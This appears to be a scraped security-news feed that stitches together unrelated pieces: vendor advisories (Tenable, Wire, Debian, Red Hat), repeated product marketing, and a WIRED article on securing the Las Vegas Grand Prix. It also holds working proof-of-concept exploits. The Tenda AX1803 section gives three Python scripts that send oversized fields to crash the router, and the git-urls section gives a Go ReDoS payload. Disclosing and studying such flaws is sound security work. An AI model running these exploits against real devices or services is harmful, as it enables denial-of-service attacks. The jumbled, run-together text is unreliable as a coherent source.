
An arbitrary file write vulnerability exists where an authenticated attacker with privileges on the managing application could alter Nessus Rules variables to overwrite arbitrary files on the remote host, which could lead to a denial of service condition. 



_This page contains information regarding security vulnerabilities that may impact Tenable's products. This may include issues specific to our software, or due to the use of third-party libraries within our software. Tenable strongly encourages users to ensure that they upgrade or apply relevant patches in a timely manner._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

**Tenable Advisory ID:** TNS-2023-41

**Risk Factor:** Medium

**Credit:**  
Ammarit Thongthua and Sarun Pornjarungsak of Secure D Research Team

**CVSSv3 Base / Temporal Score:**  
6.8 / 6.1

**CVSSv3 Vector:**  
AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H/E:P/RL:O/RC:C

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Nessus Professional Free**

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

**NEW - Tenable Nessus Expert  
Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Pro Trial.

**Buy Tenable Nessus Professional**

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

**Buy Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable Lumin**

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable Security Center**

_Formerly Tenable.sc_

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable OT Security**

_Formerly Tenable.ot_

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable Identity Exposure**

_Formerly Tenable.ad_

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Request a Demo of Tenable Cloud Security**

_**Exceptional unified cloud security awaits you!**_

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable Attack Surface Management In Action**

_Formerly Tenable.asm_

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

**Try Tenable Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Tenable Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2023-6178: [R1] Nessus Agent Version 10.4.4 Fixes One Vulnerability

Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow via the time parameter in the function saveParentControlInfo . This vulnerability allows attackers to cause a Denial of Service (DoS) attack

**Vulnerability introduction**

Tenda AX1803 firmware version v1.0.0.1 has a stack overflow vulnerability because it uses the strcpy function by mistake in the deviceId、time and urls parameter of the saveParentControlInfo function which can cause a Denial of Service (DoS) attck.  
Firmware download address:https://down.tenda.com.cn/uploadfile/AX1803/AX1803V2.0\_V1.0.0.1\_cn.zip

**Vulnerability analysis****deviceId parameter in the function saveParentControlInfo**

In the binary file /bin/tdhttpd, we use IDA to locate the function saveParentControlInfo that causes the vulnerability.  

As you can see, the strcpy function is called on line 28 of the saveParentControlInfo function. Let’s trace the source of the two parameters of the strcpy function.  

We found that parameter v2 was generated when the sub\_295C8 function processed the deviceId parameter, and v5 was malloced on the heap.  
As we all know, strcpy does not check the length of the parameter. If the deviceId is assigned a long string such as b"a"\*0x400, it will cause a heap overflow in saveParentControlInfo, causing the entire program to crash and achieve the effect of a denial of service attack (Dos)  
exp:

    import requests
     
    def deviceId():
          data = {
              b"deviceId":b"A"*0x400,
              b"deviceName": b'a',
              b"time": b'a',
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a',
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    deviceId()

**time parameter in the function saveParentControlInfo**

In line 34 of the saveParentControlInfo function, the sub\_60CFC function is called, and this function calls sub\_295C8 to obtain the time field.  

However, after obtaining the time parameter, the obtained time is simply assigned to v4, and strcpy is directly called to pass it to the variable (a2+34) on the stack, without any verification in the middle. it will cause a stack overflow We assign the time field to b'a'\*0x400 as before,which caused the program to crash.  

exp:

    import requests
     
    def time():
          data = {
              b"deviceId":b"A",
              b"deviceName": b'a',
              b"time": b'a'*0x400,
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a',
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    time()

**urls parameter in the function saveParentControlInfo**

In line 34 of the saveParentControlInfo function, the sub\_60CFC function is called, and this function calls sub\_295C8 to obtain the time field.  

Like the previous deviceId field, the program simply took out the urls without checking the length. Therefore, when the program passed time to (a2 + 80) through strcpy, a heap overflow occurred.  
exp:

    import requests
     
    def urls():
          data = {
              b"deviceId":b"A",
              b"deviceName": b'a',
              b"time": b'a',
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a'*0x400,
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    urls()

**environment**

Create a new net bridge

    sudo apt install uml-utilities bridge-utils
     sudo brctl addbr br0
     sudo brctl addif br0 ens33
     sudo ifconfig br0 up
     sudo dhclient br0

Install libc for arm environment and copy qemu-arm-static to the firmware root folder

    sudo apt install qemu-user-static libc6-arm* libc6-dev-arm*
    cp $(which qemu-arm-static) .
    sudo chroot ./ ./qemu-arm-static  ./bin/tdhttpd

use  
sudo qemu-arm-static -L ../ ./tdhttpd  
to simulates running firmware

Now we can access http://192.168.44.128/main.html to enter the virtual router for testing

CVE-2023-48111: Tenda AX1803 was discovered  A series of fatal vulnerabilities that can cause a Denial of Service (DoS)

wire-avs provides Audio, Visual, and Signaling (AVS) functionality sure the secure messaging software Wire. Prior to versions 9.2.22 and 9.3.5, a remote format string vulnerability could potentially allow an attacker to cause a denial of service or possibly execute arbitrary code. The issue has been fixed in wire-avs 9.2.22 & 9.3.5 and is already included on all Wire products. No known workarounds are available.

**Affected versions**

<=9.2.22, <=9.3.5

**Patched versions**

9.2.22, 9.3.5

**Description**

**Impact**

A remote format string vulnerability could potentially allow an attacker to cause a denial of service or possibly execute arbitrary code.

**Patches**

*   The issue has been fixed in wire-avs 9.2.22 & 9.3.5 and is already included on all Wire products.

**Workarounds**

*   No workaround known

**References**

*   Fixed in commit 364c332

**For more information**

If you have any questions or comments about this advisory feel free to email us at vulnerability-report@wire.com

CVE-2023-48221: Remote format string vulnerability

Debian Linux Security Advisory 5559-1 - A vulnerability was discovered in the SSH dissector of Wireshark, a network protocol analyzer, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5559-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 19, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : wiresharkCVE ID         : CVE-2023-6174 CVE-2023-6175A vulnerability was discovered in the SSH dissector of Wireshark, anetwork protocol analyzer, which could result in denial of service orpotentially the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 4.0.11-1~deb12u1.We recommend that you upgrade your wireshark packages.For the detailed security status of wireshark please refer toits security tracker page at:https://security-tracker.debian.org/tracker/wiresharkFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVaYm8ACgkQEMKTtsN8Tjbp5A//TSNrnxYrdW4XklOocknIwdtDtzt3AcXA6MLRlWmXnR9I3JWAnfWG84ezlXM/p3kLRN2bzfYVqhL2MpCNQzDyrTpx+0GWSImkPy520WlIrC64GHOqffIffDeF+28bQfdhbI13Kcfc9F7/PLIA9VvzqoFPHlCVdJhxvaCCJHBN2HefNC4fnEKlpU+ZI/68nzvzZsJG5K3tcdUp9BDYr8eRqmfWwuIteTBqfZ13ohvU8lYK6TNZah+NiGoSUmLGtf/5QMXeytiIVDkul5+b206ckvotm2EZQXtZntjZijPbLI1Fh8rPAuVDEbmBQOwYYc7OKlNDKl3GM2bnMXbJaNDBJ2YJk2hO5OfTankrnY54LX7R3D0WBhsDRb7X4tx9shgWOm23aigUj0ebR5jVmaDMYAOMEr5U9juPa8LBRu9gQWRbuuwADTcjsGQiYhjqKoGrCErSInuQUyNSgmyBQgeA4uQipSLpQozt42u2CfBJb5te+sI/USF9xK6xusF5BZK+5leinGLQyDd/wMn8gx/UzbDcvjuT3XMek+1fJjVfzLehorwt+Ck4yXc9edKRFS86ZRVSchFVmZUFREGszNQAwWUbtlXfeLBIF8yNqp7E9qTMyjBpCplk/Vnb3va6wJhMCYTUAgBYVjQ2P6tCPyQJHB8HrXgexcBluGBuu1q2b4M==sLQ/-----END PGP SIGNATURE-----

Debian Security Advisory 5559-1

Debian Linux Security Advisory 5558-1 - Two security vulnerabilities have been discovered in Netty, a Java NIO client/server socket framework.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5558-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
November 18, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : netty  
CVE ID         : CVE-2023-34462 CVE-2023-44487  
Debian Bug     : 1038947 1054234

Two security vulnerabilities have been discovered in Netty, a Java NIO  
client/server socket framework.

CVE-2023-34462

    It might be possible for a remote peer to send a client hello packet during  
    a TLS handshake which lead the server to buffer up to 16 MB of data per  
    connection. This could lead to a OutOfMemoryError and so result in a denial  
    of service.

CVE-2023-44487

    The HTTP/2 protocol allowed a denial of service (server resource  
    consumption) because request cancellation can reset many streams quickly.  
    This problem is also known as Rapid Reset Attack.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:4.1.48-4+deb11u2.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:4.1.48-7+deb12u1.

We recommend that you upgrade your netty packages.

For the detailed security status of netty please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/netty

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmVY5TZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRHiBAAzFhW85Ho37J02wrSDVwhIMTsVjNO9lnA08Pswdohr9K1wxeCJ/hBAx97  
UNIrjTxyOfCJWi1Kj5pITXEHBRu6w1fj/5y9yoMpAKEu+oGQroHbSf4CPmqP2Of0  
eamkfbGx2Dh7Ug3qYxe+elcqRtU3gu8I8DYcWJnm2VpWq7/pbNJ+9iqtmMjhkPLH  
1etLI/5HAkwpPimZSrHzcimn39gEVaIbZLc86ZBAoAPghc+iJR1JFHERmkEutWkB  
eAnL3kD1mr6F711eZvDfPaRfEUVorW67ZEpPX68MJExuYHNXd268EhQOhf/ZYv8g  
SUSBJuKw4w2OnL4fn8lhqnQgYHUVkcYBtfYii6E9bEVAIPoaT+4gvdSg9zkF6cza  
Da8SXkEY2ysaX+A24iVnCNMpCMSOUOxWsFFvkCcfi8A4HxGGqWzVOsBbDJKjktS1  
g6FyeqWsGh9QG/CPYeMN7LB7lW1l2XzO6GQ9QR1rzU/whgUVxprkye5wx2BaQmom  
rrWVHBijH1cNWd1IbryAm+prduL1l/CNR0785ZPTjB3SsMFPCAtRHf9G976rqVs0  
P3jGg+BdeDj+sd3EFHcHnNXQOaETgR07RWzngbjEkgmJYhB2B43hCQ2LwsNlHsmg  
O6otUI2k274IF9KHh0T1h1hopbUTU8VPy3dpcLloCzk7KiAv1RI=  
=4ExT  
-----END PGP SIGNATURE-----

Debian Security Advisory 5558-1

Red Hat Security Advisory 2023-7345-01 - An update is now available for Red Hat OpenShift GitOps 1.9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7345.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift GitOps v1.9.3 security update  
Advisory ID:        RHSA-2023:7345-01  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7345  
Issue date:         2023-11-20  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps 1.9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

An update is now available for Red Hat OpenShift GitOps 1.9.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://docs.openshift.com/gitops/1.9/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-7345-01

Red Hat Security Advisory 2023-7344-01 - An update for openshift-gitops-kam is now available for Red Hat OpenShift GitOps 1.9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7344.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openshift-gitops-kam security updateAdvisory ID:        RHSA-2023:7344-01Product:            Red Hat OpenShift GitOpsAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7344Issue date:         2023-11-20Revision:           01CVE Names:          CVE-2023-39325====================================================================Summary: An update for openshift-gitops-kam is now available for Red Hat OpenShift GitOps 1.9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:An update for openshift-gitops-kam is now available for Red Hat OpenShift GitOps 1.9.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-39325References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2242803https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-7344-01

Beyond the blinding speeds and sharp turns on new terrain, the teams at this weekend’s big F1 race are preparing for another kind of danger.

Every Formula 1 race weekend is essentially a pop-up event in a different city around the world, bringing 10 teams, their cars, and their entire mobile infrastructure to Australia, Singapore, Monaco, and beyond. This weekend's Las Vegas Grand Prix is especially unscripted, though, because the event is Formula 1's debut in Sin City. Cold weather and a rogue drain cover on the track have already injected some chaos into the spectacle. But as they prepared for the event, cybersecurity specialists from McLaren Racing, the city of Las Vegas, and the security firm Darktrace told WIRED that they aren't deterred—their whole job is to expect the unexpected.

Major live sporting events are a prime target for hackers because they are prominent, highly visible, and draw international attention. Russia's notorious attempt to target the 2018 Winter Olympics in South Korea, for example, included both disruptive attacks and hacks for information gathering. All sports now incorporate advanced elements of digital analysis and quantified performance, but Formula 1 is a particularly data-heavy sport. Race cars are essentially giant sensor arrays that are hurtling around at more than 200 miles per hour, generating massive amounts of information. The quicker teams can crunch the numbers from the track, the sooner they can determine which strategies and modifications to employ in real time or in preparation for the final race of the weekend. But a denial of service attack on any of a team’s engineering systems, one that disrupts their real-time communications, or theft of intellectual property could be disastrous for an F1 team.

“We’re a very public sport,” says Ed Green, McLaren's head of commercial technology. “Our people are known and where we’re racing is known and what we do is known. And while there are lots of unknown things about our operation, lots of what we do is public so people can find out information and start to target us. So what we’re trying to do is make sure that security is part of the team and an additive part of what we do.”

Green describes McLaren's setup at each race as “an extension of the office for the weekend.” The infrastructure is a sort of mobile data center where, for example, the pit crew on the ground is working as a remote part of the garage back at headquarters. This means that a crucial component of the entire operation is reducing latency in the digital connection between the track and home base—a geographic and network distance that varies significantly from weekend to weekend as the season plays out around the world. Green says that during the Brazil race in Sao Paulo at the beginning of November, McLaren was connected to its HQ in England with just a 223-millisecond delay.

“We pull down 1.5 terabytes of data a weekend and run 50 million simulations over the course of a weekend. And I would break down the importance of cybersecurity in a few different buckets,” McLaren CEO Zak Brown says. “We have the design IP of our race car, and that is highly confidential trade secrets that we're moving around a lot. We're dealing with third parties and racing around the world. And then we have all the data that is going on at the race track, where we're literally making split-second decisions.”

Darktrace, which provides digital defense services for McLaren and has also worked with the city of Las Vegas on its cybersecurity for years, says that phishing, business email compromise, and other scams are the types of attacks its real-time, artificial-intelligence-based threat monitoring system detects and blocks most often related to Formula 1, both day to day and on race weekends.

“One of the things that I've learned from being a partner with McLaren is the car changes continuously, every race there are things that are changing, new elements being introduced based on the track conditions,” says Nicole Eagan, Darktrace's chief strategy and AI officer. “It's a continuous updating and changing of IP that's much more dynamic than in other industries that we protect.”

All of this change and quick communication both within an organization and with third parties creates potential opportunities for scammers. But McLaren's Brown also notes that Formula 1 teams need to be wary of their position on the global stage.

“It's one thing to lock down Fort Knox—we’re moving 24 times around the world into different countries, from China to Saudi Arabia to Las Vegas,” he says. “Each one has its own challenges. With the growth of the sport, how much technology we use and where we're racing, people will attempt to use our sport sometimes in a political nature. There are bad actors that can potentially come at us from every angle and for every reason, some of which aren't personal. So therefore cybersecurity is right at the top of the list when we go through our IT needs.”

While Darktrace chief information security officer Mike Beck agrees that geopolitics and hacktivism can pose a threat to a sport with as much global reach as F1, he adds that competitive racing's simple and straightforward goal is an advantage for defenders.

“The mission is so clear, get that car around the track as fast as possible and make sure no one steals your IP and you don’t get locked out,” he says. “When you get that sort of clarity on a mission you can articulate risk really, really well.”

While preparing for the Formula 1 race weekend has been a logistical challenge in many ways, Michael Sherwood, Las Vegas' chief innovation and technology officer, says that the city is well positioned to handle the cybersecurity component because it deals with so many high-profile events throughout the year. Las Vegas has also invested in smart city infrastructure and already defends a massive array of deployed sensors and other networked devices.

Recent cyberattacks that targeted some of Las Vegas' entertainment giants, including Caesar's and MGM Resorts, have put the city on even higher alert, Sherwood says. But he adds that whether he's working on digital defenses for the Grand Prix, New Year's Eve, or just a regular night of epic Vegas partying, “there’s no resting. This is the world we live in—you’re on guard all the time, preparing and prepping.”

Inside the Race to Secure the F1 Las Vegas Grand Prix

git-urls version 1.0.1 is vulnerable to ReDOS (Regular Expression Denial of Service) in Go package.

**Inefficient Regular Expression Complexity in git-urls**

Moderate severity GitHub Reviewed Published Nov 18, 2023 to the GitHub Advisory Database • Updated Nov 20, 2023

GHSA-3f2q-6294-fmq5: Inefficient Regular Expression Complexity in git-urls

\[NAME OF AFFECTED PRODUCT(S)\]

\- https://pkg.go.dev/github.com/whilp/git-urls v1.0.1

\[AFFECTED AND/OR FIXED VERSION(S)\]

\- v1.0.1

\- Status: not fixed

\[VULNERABILITY\]

\- Regex Denial of Service

\[DESCRIPTION\]

The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside

directory path of the git url.

It is possible to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:

var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay

malicious\_url := "6en6ar@-:0////" + payload + "\\"

begin := time.Now()

//u, err := giturls.ParseScp("remote\_username@10.10.0.2:/remote/directory")// normal git url

\_, err := giturls.ParseScp(malicious\_url)

if err != nil {

fmt.Errorf("\[ - \] Error ->" + err.Error())

}

//fmt.Println("\[ + \] Url --> " + u.Host)

elapse := time.Since(begin)

fmt.Printf("Function took %s", elapse)

This vulnerbale regex causes the application to take longer time in parsing the input.

Tag

#dos